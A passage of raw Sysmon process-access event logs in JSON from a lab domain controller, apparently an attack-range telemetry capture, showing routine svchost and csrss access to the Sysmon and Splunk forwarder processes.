C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-001081680300}","TargetProcessId":"3820","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1672,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1673,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1674,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1675,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1676,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1677,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1678,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1679,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 